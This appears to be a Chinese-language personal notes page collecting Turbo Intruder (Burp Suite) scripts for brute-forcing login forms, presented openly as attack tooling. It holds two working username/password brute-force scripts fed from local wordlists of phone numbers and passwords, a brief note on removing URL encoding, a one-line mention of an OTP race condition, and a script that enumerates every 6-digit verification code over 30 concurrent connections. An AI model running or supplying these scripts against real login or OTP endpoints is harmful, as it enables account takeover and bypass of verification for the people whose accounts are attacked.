爆破用户名密码脚本

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
from urllib import quote

def password_brute(target,engine):
  for word in open('/Users/mac/safe/web/brute/mypass.txt'):
        engine.queue(target.req, quote(word.rstrip()))

def user_brute(target,engine):
  for word in open('/Users/mac/safe/web/brute/myuser.txt'):
        engine.queue(target.req, quote(word.rstrip()))
def user_password_brute(target, engine):
  for password in open(r"C:\Users\tea90\Downloads\f.txt"):
    for user in open(r"C:\Users\tea90\Downloads\phone.txt"):
            engine.queue(target.req, [quote(user.rstrip()),quote(password.rstrip())])

def queueRequests(target, wordlists):
    engine = RequestEngine(endpoint=target.endpoint,
            concurrentConnections=30,
            requestsPerConnection=100,
            pipeline=False
            )
    #user_brute(target,engine)
    #password_brute(target,engine)
    user_password_brute(target,engine)

def handleResponse(req, interesting):
# currently available attributes are req.status, req.wordcount, req.length and req.response
    if req.status == 302:
       table.add(req)

去除编码

urllib.quote 函数来处理从文件中读取的每一行数据。这个函数通常用于URL编码,它会对某些特殊字符(如空格、@ 符号等)进行转义。然而,在你的情况下,如果文件中的 @ 符号被错误地转义,而你的目的是在密码或用户名中直接使用这些符号,那么你可能不需要使用 quote 函数。 

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
from urllib import quote

def password_brute(target,engine):
  for word in open(r"C:\Users\tea90\Downloads\phone.txt"):
        engine.queue(target.req, quote(word.rstrip()))

def user_brute(target,engine):
  for word in open('/Users/mac/safe/web/brute/myuser.txt'):
        engine.queue(target.req, quote(word.rstrip()))
def user_password_brute(target, engine):
  for password in open(r"C:\Users\tea90\Downloads\phone.txt"):
    for user in open(r"C:\Users\tea90\Downloads\f.txt"):
            engine.queue(target.req, [user.rstrip(),password.rstrip()])

def queueRequests(target, wordlists):
    engine = RequestEngine(endpoint=target.endpoint,
            concurrentConnections=30,
            requestsPerConnection=100,
            pipeline=False
            )
    #user_brute(target,engine)
    #password_brute(target,engine)
    user_password_brute(target,engine)

def handleResponse(req, interesting):
# currently available attributes are req.status, req.wordcount, req.length and req.response
    if req.status != 404:
       table.add(req)

example

竞争条件之:给两个不同的手机号发送otp会发送同样的otp

爆破6位数验证码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
from itertools import product

def brute_veify_code(target, engine, length):
    pattern = '1234567890'
    for i in list(product(pattern, repeat=length)):
         code =  ''.join(i)
         engine.queue(target.req, code)


def queueRequests(target, wordlists):
    engine = RequestEngine(endpoint=target.endpoint,
            concurrentConnections=30,
            requestsPerConnection=100,
            pipeline=True
            )
    brute_veify_code(target, engine, 6)


def handleResponse(req, interesting):
# currently available attributes are req.status, req.wordcount, req.length and req.response
  if 'error' not in req.response:
       table.add(req)